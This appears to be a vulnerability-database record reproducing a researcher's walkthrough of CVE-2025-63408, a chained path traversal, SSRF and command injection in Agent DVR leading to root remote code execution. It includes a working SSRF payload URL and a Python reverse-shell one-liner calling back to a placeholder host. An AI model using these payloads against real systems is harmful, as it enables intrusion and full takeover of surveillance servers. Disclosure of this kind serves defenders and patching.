{"uuid": "c4273ed6-7073-4456-bb8f-28d2b213259b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "name": "RCE in Agent DVR", "description": "Description:\n------------\nRef: [https://www.ericholub.com/blog/agent-dvr-rce/](https://www.ericholub.com/blog/agent-dvr-rce/)\n\n[Agent DVR](https://www.ispyconnect.com/download) is surveillance recording software from [iSpyConnect](https://www.ispyconnect.com/). Versions \u2264 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into **CVE-2025-63408**.\n\nWalkthrough:\n------------\n\nAgent DVR has a local API where you can access things like recordings without any kind of authentication. Here\u2019s the API docs for it:\n\n[\n\nSwagger UI\n\n![](https://ispysoftware.github.io/Agent_API/dist/favicon-32x32.png)https://ispysoftware.github.io/Agent\\_API/#/\n\n\n\n](https://ispysoftware.github.io/Agent_API/#/)\n\nOne call in particular is interesting, which is \u2018addrecording\u2019. This lets you assign a \u2018recording\u2019 to a particular camera.\n\nTurns out this call is vulnerable to path traversal. I\u2019ve already written some exploit code on how to get any file from the filesystem from this:\n\n[https://github.com/eric-m-holub/double-agent](https://github.com/eric-m-holub/double-agent)\n\nThis vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I\u2019m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.\n\nFirst off, add a new Network IP Camera.\n\n[![](image.png)](image.png)\n\n[![](image%201.png)](image%201.png)\n\n[![](image%202.png)](image%202.png)\n\nNext select the gear icon to update the Source Type:\n\n[![](image%203.png)](image%203.png)\n\nNow enter in the following payload for \u2018Live URL\u2019:\n\n\ud83d\udcb2\n\nhttp://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh\n\n[![](image%204.png)](image%204.png)\n\nPress \u2018OK\u2019 and then flip the camera on and off:\n\n[![](image%205.png)](image%205.png)\n\nThis leverages an SSRF vulnerability which calls this local API and creates a file called \u2018rce.sh\u2019 in the \u2018Commands\u2019 directory of Agent DVR using directory traversal. It doesn\u2019t matter what the file contents are, only the file extension type.\n\nNow create a new Action and Task for this camera:\n\n[![](image%206.png)](image%206.png)\n\n[![](image%207.png)](image%207.png)\n\n[![](image%208.png)](image%208.png)\n\n[![](image%209.png)](image%209.png)\n\nNow on the popup to create a task select \u201cExecute Command\u201d and select the created \u2018rce\u2019 file:\n\n[![](image%2010.png)](image%2010.png)\n\nFor the \u2018Parameters\u2019 input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. Here\u2019s that payload:\n\n```\n`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'`\n```\n\n\nAt this point, I\u2019d suggest updating your new camera to something with an \u2018Image\u2019 source so we can make a new recording from it:\n\n[![](image%2011.png)](image%2011.png)\n\n[![](image%2012.png)](image%2012.png)\n\nYou can put any Image URL you want in there\n\nSo now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:\n\n[![](image%2013.png)](image%2013.png)\n\n[![](image%2014.png)](image%2014.png)\n\nTah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.", "creation_timestamp": "2025-11-18T15:39:57.050224+00:00", "timestamp": "2025-11-18T15:42:01.065551+00:00", "related_vulnerabilities": ["CVE-2025-63408"], "author": {"login": "adulau", "name": "Alexandre Dulaunoy", "uuid": "c933734a-9be8-4142-889e-26e95c752803"}}